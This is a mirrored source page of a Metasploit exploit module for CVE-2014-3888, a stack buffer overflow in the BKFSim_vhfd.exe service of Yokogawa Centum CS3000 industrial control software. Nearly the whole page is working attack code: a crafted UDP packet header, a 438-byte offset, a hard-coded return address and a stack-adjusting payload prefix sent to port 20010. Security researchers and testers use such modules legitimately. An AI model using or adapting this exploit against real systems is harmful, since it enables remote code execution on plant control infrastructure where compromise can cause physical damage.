Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb
19593 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Udp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability

18
          exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create

19
          logs using functions like vsprintf and memcpy in an insecure way. This module has been

20
          tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.

21
        },

22
        'Author' => [

23
          'Redsadic <julian.vilas[at]gmail.com>',

24
          'juan vazquez'

25
        ],

26
        'References' => [

27
          ['CVE', '2014-3888'],

28
          ['URL', 'http://jvn.jp/vu/JVNVU95045914/index.html'],

29
          ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf'],

30
          ['URL', 'https://www.rapid7.com/blog/post/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow']

31
        ],

32
        'Payload' => {

33
          'Space' => 1770, # 2228 (max packet length) - 16 (header) - (438 target['Offset']) - 4 (ret)

34
          'DisableNops' => true,

35
          'BadChars' => "\x00",

36
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500

37
        },

38
        'Platform' => 'win',

39
        'Targets' => [

40
          [

41
            'Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3',

42
            {

43
              'Ret' => 0x61e55c9c, # push esp | ret # LibBKCCommon.dll

44
              'Offset' => 438

45
            }

46
          ],

47
        ],

48
        'DisclosureDate' => '2014-05-23',

49
        'DefaultTarget' => 0,

50
        'Notes' => {

51
          'Reliability' => UNKNOWN_RELIABILITY,

52
          'Stability' => UNKNOWN_STABILITY,

53
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

54
        }

55
      )

56
    )

57


58
    register_options(

59
      [

60
        Opt::RPORT(20010)

61
      ]

62
    )

63
  end

64


65
  def exploit

66
    connect_udp

67


68
    sploit = "\x45\x54\x56\x48\x01\x01\x10\x09\x00\x00\x00\x01\x00\x00\x00\x44" # header

69
    sploit << rand_text(target['Offset'])

70
    sploit << [target.ret].pack("V")

71
    sploit << payload.encoded

72


73
    print_status("Trying target #{target.name}, sending #{sploit.length} bytes...")

74
    udp_sock.put(sploit)

75


76
    disconnect_udp

77
  end

78
end

79


80